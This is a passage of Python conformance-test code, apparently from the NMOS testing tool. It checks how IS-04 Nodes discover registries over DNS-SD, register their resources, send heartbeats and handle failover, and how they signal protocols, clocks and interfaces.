# when the first registry is disabled, an additional few seconds is needed to ensure the node
# has a chance to make a connection to it, receive the 5xx error, and make a connection to
# the next one
if CONFIG.ENABLE_HTTPS:
heartbeat_countdown = CONFIG.HEARTBEAT_INTERVAL + 1 + 5
else:
heartbeat_countdown = CONFIG.HEARTBEAT_INTERVAL + 1
            # Wait an extra heartbeat interval when dealing with the timeout test
# This allows a Node's connection to time out and then register with the next mock registry
if (index + 2) == len(self.registries):
heartbeat_countdown += CONFIG.HEARTBEAT_INTERVAL
while len(self.registries[index + 1].get_data().heartbeats) < 1 and heartbeat_countdown > 0:
# Wait until the heartbeat interval has elapsed or a heartbeat has been received
time.sleep(0.2)
heartbeat_countdown -= 0.2
if len(self.registries[index + 1].get_data().heartbeats) < 1:
# Testing has failed at this point, so we might as well abort
break
# Clean up mDNS advertisements and disable registries
if CONFIG.DNS_SD_MODE == "multicast":
for info in registry_mdns:
self.zc.unregister_service(info)
self.invalid_registry.disable()
for index, registry in enumerate(self.registries):
registry.disable()
self.registry_basics_done = True
for registry in self.registries:
self.registry_basics_data.append(registry.get_data())
self.registry_invalid_data = self.invalid_registry.get_data()
# If the Node preferred the invalid registry, don't penalise it for other tests which check the general
# interactions are correct
if len(self.registry_invalid_data.posts) > 0:
self.registry_primary_data = self.registry_invalid_data
else:
self.registry_primary_data = self.registry_basics_data[0]
def test_01(self, test):
"""Node can discover network registration service via multicast DNS"""
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "multicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'multicast'")
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) > 0:
return test.PASS()
return test.FAIL("Node did not attempt to register with the advertised registry.")
def test_01_01(self, test):
"""Node does not attempt to register with an unsuitable registry"""
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") == 0:
return test.NA("Nodes running v1.0 do not check DNS-SD api_ver and api_proto TXT records")
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "multicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'multicast'")
self.do_registry_basics_prereqs()
if len(self.registry_invalid_data.posts) > 0:
return test.FAIL("Node incorrectly registered with a registry advertising an invalid 'api_ver' or "
"'api_proto'")
return test.PASS()
def test_02(self, test):
"""Node can discover network registration service via unicast DNS"""
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "unicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'unicast'")
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) > 0:
return test.PASS()
return test.FAIL("Node did not attempt to register with the advertised registry.")
def test_02_01(self, test):
"""Node does not attempt to register with an unsuitable registry"""
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") == 0:
return test.NA("Nodes running v1.0 do not check DNS-SD api_ver and api_proto TXT records")
if not CONFIG.ENABLE_DNS_SD or CONFIG.DNS_SD_MODE != "unicast":
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False or DNS_SD_MODE is not "
"'unicast'")
self.do_registry_basics_prereqs()
if len(self.registry_invalid_data.posts) > 0:
return test.FAIL("Node incorrectly registered with a registry advertising an invalid 'api_ver' or "
"'api_proto'")
return test.PASS()
def test_03(self, test):
"""Registration API interactions use the correct headers"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) == 0:
return test.UNCLEAR("No registrations found")
ctype_warn = ""
for resource in registry_data.posts:
ctype_valid, ctype_message = self.check_content_type(resource[1]["headers"])
if not ctype_valid:
return test.FAIL(ctype_message)
elif ctype_message and not ctype_warn:
ctype_warn = ctype_message
accept_valid, accept_message = self.check_accept(resource[1]["headers"])
if not accept_valid:
return test.FAIL(accept_message)
if "Transfer-Encoding" not in resource[1]["headers"]:
if "Content-Length" not in resource[1]["headers"]:
return test.FAIL("One or more Node POSTs did not include Content-Length")
else:
if "Content-Length" in resource[1]["headers"]:
return test.FAIL("API signalled both Transfer-Encoding and Content-Length")
if ctype_warn:
return test.WARNING(ctype_warn)
else:
return test.PASS()
def test_03_01(self, test):
"""Registration API interactions use the correct versioned path"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.posts) == 0:
return test.UNCLEAR("No registrations found")
for resource in registry_data.posts:
if resource[1]["version"] != api["version"]:
return test.FAIL("One or more Node POSTs used version '{}' instead of '{}'"
.format(resource[1]["version"], api["version"]))
for resource in registry_data.deletes:
if resource[1]["version"] != api["version"]:
return test.FAIL("One or more Node DELETEs used version '{}' instead of '{}'"
.format(resource[1]["version"], api["version"]))
for resource in registry_data.heartbeats:
if resource[1]["version"] != api["version"]:
return test.FAIL("One or more Node heartbeats used version '{}' instead of '{}'"
.format(resource[1]["version"], api["version"]))
return test.PASS()
def get_registry_resource(self, res_type, res_id):
"""Get a specific resource ID from the mock registry, or a real registry if DNS-SD is disabled"""
found_resource = None
if CONFIG.ENABLE_DNS_SD:
# Look up data in local mock registry
registry_data = self.registry_primary_data
for resource in registry_data.posts:
if resource[1]["payload"]["type"] == res_type and resource[1]["payload"]["data"]["id"] == res_id:
found_resource = resource[1]["payload"]["data"]
else:
# Look up data from a configured Query API
url = "{}://{}:{}/x-nmos/query/{}/{}s/{}".format(
self.protocol,
CONFIG.QUERY_API_HOST,
str(CONFIG.QUERY_API_PORT),
self.apis[NODE_API_KEY]["version"],
res_type,
res_id
)
try:
valid, r = self.do_request("GET", url)
if valid and r.status_code == 200:
found_resource = r.json()
else:
raise Exception
except Exception:
print(" * ERROR: Unable to load resource from the configured Query API ({}:{})".format(
CONFIG.QUERY_API_HOST,
CONFIG.QUERY_API_PORT
))
return found_resource
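    # Illustrative example (hypothetical host/port/UUID): with DNS-SD disabled, the
    # lookup above queries a real Query API at a URL of the form
    #   {protocol}://{QUERY_API_HOST}:{QUERY_API_PORT}/x-nmos/query/{version}/{type}s/{id}
    # e.g. http://192.0.2.10:8870/x-nmos/query/v1.3/senders/<sender-uuid>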
def get_node_resources(self, res_type):
"""Get resources matching a specific type from the Node API"""
if res_type == "node":
res_type = "self"
else:
res_type = res_type + "s"
resp_json = self.node_basics_data[res_type]
resources = {}
if resp_json is None:
raise ValueError
elif isinstance(resp_json, dict):
resources[resp_json["id"]] = resp_json
else:
for resource in resp_json:
resources[resource["id"]] = resource
return resources
def do_test_matching_resource(self, test, res_type):
"""Check that a resource held in the registry matches the resource held by the Node API"""
try:
node_resources = self.get_node_resources(res_type)
if len(node_resources) == 0:
return test.UNCLEAR("No {} resources were found on the Node.".format(res_type.title()))
for res_id in node_resources:
reg_resource = self.get_registry_resource(res_type, res_id)
if not reg_resource:
return test.FAIL("{} {} was not found in the registry.".format(res_type.title(), res_id))
elif reg_resource != node_resources[res_id]:
return test.FAIL("Node API JSON does not match data in registry for "
"{} {}.".format(res_type.title(), res_id))
return test.PASS()
except ValueError:
return test.FAIL("Failed to reach Node API or invalid JSON received!")
def parent_resource_type(self, res_type):
"""Find the parent resource type required for a given resource type"""
if res_type == "device":
return "node"
elif res_type == "flow" and \
self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") <= 0:
return "source"
elif res_type in ["sender", "receiver", "source", "flow"]:
return "device"
else:
return None
def preceding_resource_type(self, res_type):
"""Find the preceding resource type recommended for a given resource type,
if different than the parent resource type"""
# The recommendation ensures e.g. that a Query API client would find the Source and Flow
# associated with a particular Sender
if res_type == "flow" and \
self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") > 0:
return "source"
elif res_type == "sender":
return "flow"
else:
return None
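    # Descriptive note (added for clarity, not in the original): taken together,
    # parent_resource_type() and preceding_resource_type() encode the expected
    # registration order, e.g. for v1.1+:
    #   node -> device -> source -> flow -> sender (and device -> receiver),
    # so do_test_referential_integrity() below can check that each POST arrives
    # after the resources it references.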
def do_test_referential_integrity(self, test, res_type):
"""Check that the parents for a specific resource type are held in the mock registry,
and the recommended order for referential integrity has been adhered to"""
api = self.apis[NODE_API_KEY]
# Look up data in local mock registry
registry_data = self.registry_primary_data
parent_type = self.parent_resource_type(res_type)
registered_parents = []
preceding_type = self.preceding_resource_type(res_type)
registered_preceding = []
preceding_warn = ""
found_resource = False
try:
# Cycle over registrations in order
for resource in registry_data.posts:
rtype = resource[1]["payload"]["type"]
rdata = resource[1]["payload"]["data"]
if rtype == parent_type:
registered_parents.append(rdata["id"])
elif preceding_type and rtype == preceding_type:
registered_preceding.append(rdata["id"])
elif rtype == res_type:
found_resource = True
if rdata[parent_type + "_id"] not in registered_parents:
return test.FAIL("{} '{}' was registered before its referenced '{}' '{}'"
.format(res_type.title(), rdata["id"],
parent_type + "_id", rdata[parent_type + "_id"]))
if preceding_type and rdata[preceding_type + "_id"] not in registered_preceding \
and not preceding_warn:
preceding_warn = "{} '{}' was registered before its referenced '{}' '{}'" \
.format(res_type.title(), rdata["id"],
preceding_type + "_id", rdata[preceding_type + "_id"])
if preceding_warn:
return test.WARNING(preceding_warn,
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/4.1._Behaviour_-_Registration.html#referential-integrity"
.format(api["spec_branch"]))
elif found_resource:
return test.PASS()
else:
return test.UNCLEAR("No {} resources were registered with the mock registry.".format(res_type.title()))
except KeyError as e:
return test.FAIL("Unable to find expected key in the registered {}: {}".format(res_type.title(), e))
def test_04(self, test):
"""Node can register a valid Node resource with the network registration service,
matching its Node API self resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "node")
def test_05(self, test):
"""Node maintains itself in the registry via periodic calls to the health resource"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
self.do_registry_basics_prereqs()
registry_data = self.registry_primary_data
if len(registry_data.heartbeats) < 2:
return test.FAIL("Not enough heartbeats were made in the time period.")
initial_node = registry_data.posts[0]
last_hb = None
for heartbeat in registry_data.heartbeats:
# Ensure the Node ID for heartbeats matches the registrations
if heartbeat[1]["node_id"] != initial_node[1]["payload"]["data"]["id"]:
return test.FAIL("Heartbeats matched a different Node ID to the initial registration.")
if last_hb:
# Check frequency of heartbeats matches the defaults
time_diff = heartbeat[0] - last_hb[0]
if time_diff > CONFIG.HEARTBEAT_INTERVAL + 0.5:
return test.FAIL("Heartbeats are not frequent enough.")
elif time_diff < CONFIG.HEARTBEAT_INTERVAL - 0.5:
return test.FAIL("Heartbeats are too frequent.")
else:
# For first heartbeat, check against Node registration
if (heartbeat[0] - initial_node[0]) > CONFIG.HEARTBEAT_INTERVAL + 0.5:
return test.FAIL("First heartbeat occurred too long after initial Node registration.")
# Ensure the heartbeat request body is empty
if heartbeat[1]["payload"] is not bytes():
return test.WARNING("Heartbeat POST contained a payload body.",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/2.2._APIs_-_Client_Side_Implementation_Notes.html#empty-request-bodies"
.format(api["spec_branch"]))
if "Content-Type" in heartbeat[1]["headers"]:
return test.WARNING("Heartbeat POST contained a Content-Type header.",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/2.2._APIs_-_Client_Side_Implementation_Notes.html#empty-request-bodies"
.format(api["spec_branch"]))
if "Transfer-Encoding" not in heartbeat[1]["headers"]:
if "Content-Length" not in heartbeat[1]["headers"] or \
int(heartbeat[1]["headers"]["Content-Length"]) != 0:
# The NMOS spec currently says Content-Length: 0 is OPTIONAL, but it is RECOMMENDED in RFC 7230
# and omitting it causes problems for commonly deployed HTTP servers
return test.WARNING("Heartbeat POST did not contain a valid Content-Length header.",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}"
"/docs/2.2._APIs_-_Client_Side_Implementation_Notes.html#empty-request-bodies"
.format(api["spec_branch"]))
else:
if "Content-Length" in heartbeat[1]["headers"]:
return test.FAIL("API signalled both Transfer-Encoding and Content-Length")
accept_valid, accept_message = self.check_accept(heartbeat[1]["headers"])
if not accept_valid:
return test.FAIL(accept_message)
last_hb = heartbeat
return test.PASS()
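    # Worked example (illustrative): with the usual IS-04 heartbeat interval of 5
    # seconds configured as CONFIG.HEARTBEAT_INTERVAL, the checks above accept
    # consecutive heartbeats spaced between 4.5 and 5.5 seconds apart, and expect
    # the first heartbeat within 5.5 seconds of the initial Node registration.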
def test_07(self, test):
"""Node can register a valid Device resource with the network registration service, matching its
Node API Device resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "device")
def test_07_01(self, test):
"""Registered Device was POSTed after a matching referenced Node"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "device")
def test_08(self, test):
"""Node can register a valid Source resource with the network
registration service, matching its Node API Source resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "source")
def test_08_01(self, test):
"""Registered Source was POSTed after a matching referenced Device"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "source")
def test_09(self, test):
"""Node can register a valid Flow resource with the network
registration service, matching its Node API Flow resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "flow")
def test_09_01(self, test):
"""Registered Flow was POSTed after a matching referenced Device or Source"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "flow")
def test_10(self, test):
"""Node can register a valid Sender resource with the network
registration service, matching its Node API Sender resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "sender")
def test_10_01(self, test):
"""Registered Sender was POSTed after a matching referenced Device"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "sender")
def test_11(self, test):
"""Node can register a valid Receiver resource with the network
registration service, matching its Node API Receiver resource"""
self.do_registry_basics_prereqs()
return self.do_test_matching_resource(test, "receiver")
def test_11_01(self, test):
"""Registered Receiver was POSTed after a matching referenced Device"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
return self.do_test_referential_integrity(test, "receiver")
def test_12(self, test):
"""Node advertises a Node type mDNS announcement with no ver_* TXT records
in the presence of a Registration API (v1.0, v1.1 and v1.2)"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
return test.DISABLED("This test is disabled for Nodes >= v1.3")
node_list = self.collect_mdns_announcements()
for node in node_list:
address = socket.inet_ntoa(node.address)
port = node.port
if address == api["ip"] and port == api["port"]:
properties = self.convert_bytes(node.properties)
for prop in properties:
if "ver_" in prop:
return test.FAIL("Found 'ver_' TXT record while Node is registered.")
if self.is04_utils.compare_api_version(api["version"], "v1.1") >= 0:
if "api_ver" not in properties:
return test.FAIL("No 'api_ver' TXT record found in Node API advertisement.")
elif api["version"] not in properties["api_ver"].split(","):
return test.FAIL("Node does not claim to support version under test.")
if "api_proto" not in properties:
return test.FAIL("No 'api_proto' TXT record found in Node API advertisement.")
elif properties["api_proto"] != self.protocol:
return test.FAIL("API protocol ('api_proto') TXT record is not '{}'.".format(self.protocol))
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
if "api_auth" not in properties:
return test.FAIL("No 'api_auth' TXT record found in Node API advertisement.")
elif not isinstance(properties["api_auth"], bool):
# zeroconf translates 'true' to True and 'false' to False automatically
return test.FAIL("API authorization ('api_auth') TXT record is not one of 'true' or 'false'.")
return test.PASS()
return test.WARNING("No matching mDNS announcement found for Node with IP/Port {}:{}. This will not affect "
"operation in registered mode but may indicate a lack of support for peer to peer "
"operation.".format(api["ip"], api["port"]),
NMOS_WIKI_URL + "/IS-04#nodes-peer-to-peer-mode")
def test_12_01(self, test):
"""Node does not advertise a Node type mDNS announcement in the presence of a Registration API (v1.3+)"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.3") < 0:
return test.DISABLED("This test is disabled for Nodes < v1.3")
node_list = self.collect_mdns_announcements()
for node in node_list:
address = socket.inet_ntoa(node.address)
port = node.port
if address == api["ip"] and port == api["port"]:
properties = self.convert_bytes(node.properties)
if "api_ver" not in properties:
return test.FAIL("No 'api_ver' TXT record found in Node API advertisement.")
min_version_lt_v1_3 = False
for api_version in properties["api_ver"].split(","):
if self.is04_utils.compare_api_version(api_version, "v1.3") < 0:
min_version_lt_v1_3 = True
if not min_version_lt_v1_3:
return test.WARNING("Nodes which support v1.3+ only should not advertise via mDNS when in "
"registered mode.")
return test.PASS()
def test_13(self, test):
"""PUTing to a Receiver target resource with a Sender resource payload is accepted
and connects the Receiver to a stream"""
valid, receivers = self.do_request("GET", self.node_url + "receivers")
if not valid or receivers.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(receivers))
try:
formats_tested = []
for receiver in receivers.json():
if not receiver["transport"].startswith("urn:x-nmos:transport:rtp"):
continue
try:
stream_type = receiver["format"].split(":")[-1]
except TypeError:
return test.FAIL("Unexpected Receiver format: {}".format(receiver))
# Test each available receiver format once
if stream_type in formats_tested:
continue
if stream_type not in ["video", "audio", "data", "mux"]:
return test.FAIL("Unexpected Receiver format: {}".format(receiver["format"]))
request_data = self.node.get_sender(stream_type)
self.do_receiver_put(test, receiver["id"], request_data)
time.sleep(CONFIG.API_PROCESSING_TIMEOUT)
valid, response = self.do_request("GET", self.node_url + "receivers/" + receiver["id"])
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(receiver))
receiver = response.json()
if receiver["subscription"]["sender_id"] != request_data["id"]:
return test.FAIL("Node API Receiver {} subscription does not reflect the subscribed "
"Sender ID".format(receiver["id"]))
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.2") >= 0:
if not receiver["subscription"]["active"]:
return test.FAIL("Node API Receiver {} subscription does not indicate an active "
"subscription".format(receiver["id"]))
formats_tested.append(stream_type)
if len(formats_tested) > 0:
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.UNCLEAR("Node API does not expose any RTP Receivers")
def test_14(self, test):
"""PUTing to a Receiver target resource with an empty JSON object payload is accepted and
disconnects the Receiver from a stream"""
valid, receivers = self.do_request("GET", self.node_url + "receivers")
if not valid or receivers.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(receivers))
try:
test_receiver = None
for receiver in receivers.json():
if not receiver["transport"].startswith("urn:x-nmos:transport:rtp"):
continue
test_receiver = receiver
break
if test_receiver is not None:
self.do_receiver_put(test, test_receiver["id"], {})
time.sleep(CONFIG.API_PROCESSING_TIMEOUT)
valid, response = self.do_request("GET", self.node_url + "receivers/" + test_receiver["id"])
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(test_receiver))
receiver = response.json()
if receiver["subscription"]["sender_id"] is not None:
return test.FAIL("Node API Receiver {} subscription does not reflect the subscribed "
"Sender ID".format(receiver["id"]))
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.2") >= 0:
if receiver["subscription"]["active"]:
return test.FAIL("Node API Receiver {} subscription does not indicate an inactive "
"subscription".format(receiver["id"]))
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.UNCLEAR("Node API does not expose any RTP Receivers")
def test_15(self, test):
"""Node correctly selects a Registration API based on advertised priorities"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
last_hb = None
last_registry = None
# All but the first and last registry can be used for priority tests. The last one is reserved for timeout tests
for index, registry_data in enumerate(self.registry_basics_data[1:-1]):
if len(registry_data.heartbeats) < 1:
return test.FAIL("Node never made contact with registry {} advertised on port {}"
.format(index + 1, registry_data.port))
first_hb_to_registry = registry_data.heartbeats[0]
if last_hb:
if first_hb_to_registry < last_hb:
return test.FAIL("Node sent a heartbeat to the registry on port {} before the registry on port {}, "
"despite their priorities requiring the opposite behaviour"
.format(registry_data.port, last_registry.port))
last_hb = first_hb_to_registry
last_registry = registry_data
return test.PASS()
def test_16(self, test):
"""Node correctly fails over between advertised Registration APIs when one fails"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
# All but the first and last registry can be used for failover tests. The last one is reserved for timeout tests
for index, registry_data in enumerate(self.registry_basics_data[1:-1]):
if len(registry_data.heartbeats) < 1:
return test.FAIL("Node never made contact with registry {} advertised on port {}"
.format(index + 1, registry_data.port))
if index > 0:
for resource in registry_data.posts:
if resource[1]["payload"]["type"] == "node":
return test.FAIL("Node re-registered its resources when it failed over to a new registry, when "
"it should only have issued a heartbeat")
return test.PASS()
def test_16_01(self, test):
"""Node correctly handles Registration APIs whose connections time out"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
# The second to last registry will intentionally cause a timeout. Check here that the Node successfully times
# out its attempted connection within a heartbeat period and then registers with the next available one.
registry_data = self.registry_basics_data[-1]
if len(registry_data.heartbeats) < 1:
return test.WARNING("Node never made contact with registry {} advertised on port {}"
.format(len(self.registry_basics_data), registry_data.port))
for resource in registry_data.posts:
if resource[1]["payload"]["type"] == "node":
return test.WARNING("Node re-registered its resources when it failed over to a new registry, when it "
"should only have issued a heartbeat")
return test.PASS()
def test_17(self, test):
"""All Node resources use different UUIDs"""
uuids = set()
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
uuids.add(response.json()["id"])
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
for resource_type in ["devices", "sources", "flows", "senders", "receivers"]:
valid, response = self.do_request("GET", self.node_url + resource_type)
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for resource in response.json():
if resource["id"] in uuids:
return test.FAIL("Duplicate ID '{}' found in Node API '{}' resource".format(resource["id"],
resource_type))
uuids.add(resource["id"])
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.PASS()
def test_17_01(self, test):
"""All Devices refer to their attached Senders and Receivers"""
# store references from Devices to Senders and Receivers
from_devices = {}
# store references to Devices from Senders and Receivers
to_devices = {}
# get all the Node's Devices
valid, response = self.do_request("GET", self.node_url + "devices")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for resource in response.json():
from_devices[resource["id"]] = {
"senders": set(resource["senders"]),
"receivers": set(resource["receivers"])
}
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if len(from_devices) == 0:
return test.UNCLEAR("Node API does not expose any Devices")
# get all the Node's Senders and Receivers
empty_refs = {"senders": set(), "receivers": set()}
for resource_type in ["senders", "receivers"]:
valid, response = self.do_request("GET", self.node_url + resource_type)
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for resource in response.json():
id = resource["device_id"]
if id not in to_devices:
to_devices[id] = deepcopy(empty_refs)
to_devices[id][resource_type].add(resource["id"])
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
found_empty_refs = False
for id, from_device in from_devices.items():
if id not in to_devices:
if from_device == empty_refs:
# no Senders or Receivers are attached to this Device
continue
else:
return test.FAIL("Device '{}' references one or more unknown Senders or Receivers."
.format(id))
to_device = to_devices[id]
if from_device == empty_refs:
# Device appears not to be populating the deprecated attributes
found_empty_refs = True
else:
for refs in ["senders", "receivers"]:
if len(from_device[refs] - to_device[refs]) > 0:
return test.FAIL("Device '{}' references one or more unknown {}."
.format(id, refs.title()))
elif len(to_device[refs] - from_device[refs]) > 0:
return test.FAIL("Device '{}' does not have a reference to one or more of its {}."
.format(id, refs.title()))
# else: references from Device to its Senders and Receivers
# match references from Senders and Receivers to that Device
if found_empty_refs:
return test.WARNING("One or more Devices do not have references to any of their Senders or Receivers. "
"(The 'senders' and 'receivers' attributes are deprecated since IS-04 v1.2.)")
return test.PASS()
def test_18(self, test):
"""All Node clocks are unique, and relate to any visible Sources' clocks"""
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.1") < 0:
return test.NA("Clocks are not available until IS-04 v1.1")
clocks = set()
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for clock in response.json()["clocks"]:
clock_name = clock["name"]
if clock_name in clocks:
return test.FAIL("Duplicate clock name '{}' found in Node API self resource".format(clock_name))
clocks.add(clock_name)
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "sources")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for source in response.json():
clock_name = source["clock_name"]
if clock_name not in clocks and clock_name is not None:
return test.FAIL("Source '{}' uses a non-existent clock name '{}'".format(source["id"], clock_name))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.PASS()
def test_19(self, test):
"""All Node interfaces are unique, and relate to any visible Senders and Receivers' interface_bindings"""
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.2") < 0:
return test.NA("Interfaces are not available until IS-04 v1.2")
interfaces = set()
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for interface in response.json()["interfaces"]:
interface_name = interface["name"]
if interface_name in interfaces:
return test.FAIL("Duplicate interface name '{}' found in Node API self resource"
.format(interface_name))
interfaces.add(interface_name)
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "senders")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for sender in response.json():
interface_bindings = sender["interface_bindings"]
for interface_name in interface_bindings:
if interface_name not in interfaces:
return test.FAIL("Sender '{}' uses a non-existent interface name '{}'"
.format(sender["id"], interface_name))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "receivers")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for receiver in response.json():
interface_bindings = receiver["interface_bindings"]
for interface_name in interface_bindings:
if interface_name not in interfaces:
return test.FAIL("Receiver '{}' uses a non-existent interface name '{}'"
.format(receiver["id"], interface_name))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.PASS()
def test_20(self, test):
"""Node's resources correctly signal the current protocol and IP/hostname"""
found_api_endpoint = False
found_href = False
href_hostname_warn = False
api_endpoint_host_warn = False
service_href_scheme_warn = False
service_href_hostname_warn = False
control_href_scheme_warn = False
control_href_hostname_warn = False
manifest_href_scheme_warn = False
manifest_href_hostname_warn = False
api = self.apis[NODE_API_KEY]
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
node_self = response.json()
if not node_self["href"].startswith(self.protocol + "://"):
return test.FAIL("Node 'href' does not match the current protocol")
if node_self["href"].startswith("https://") and urlparse(node_self["href"]).hostname[-1].isdigit():
href_hostname_warn = True
if self.is04_utils.compare_api_version(api["version"], "v1.1") >= 0:
for endpoint in node_self["api"]["endpoints"]:
if endpoint["protocol"] != self.protocol:
return test.FAIL("One or more Node 'api.endpoints' do not match the current protocol")
if endpoint["host"] == api["hostname"] and endpoint["port"] == api["port"]:
found_api_endpoint = True
if self.is04_utils.compare_urls(node_self["href"], "{}://{}:{}"
.format(endpoint["protocol"], endpoint["host"], endpoint["port"])):
found_href = True
if endpoint["protocol"] == "https" and endpoint["host"][-1].isdigit():
api_endpoint_host_warn = True
for service in node_self["services"]:
href = service["href"]
if href.startswith("http") and not href.startswith(self.protocol + "://"):
# Only warn about these at the end so that more major failures are flagged first
# Protocols other than HTTP may be used, so don't incorrectly flag those too
service_href_scheme_warn = True
if href.startswith("https://") and urlparse(href).hostname[-1].isdigit():
service_href_hostname_warn = True
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if self.is04_utils.compare_api_version(api["version"], "v1.1") >= 0:
if not found_api_endpoint:
return test.FAIL("None of the Node 'api.endpoints' match the current protocol, IP/hostname and port")
if not found_href:
return test.FAIL("None of the Node 'api.endpoints' match the Node 'href'")
valid, response = self.do_request("GET", self.node_url + "devices")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
node_devices = response.json()
for device in node_devices:
for control in device["controls"]:
href = control["href"]
if href.startswith("http") and not href.startswith(self.protocol + "://"):
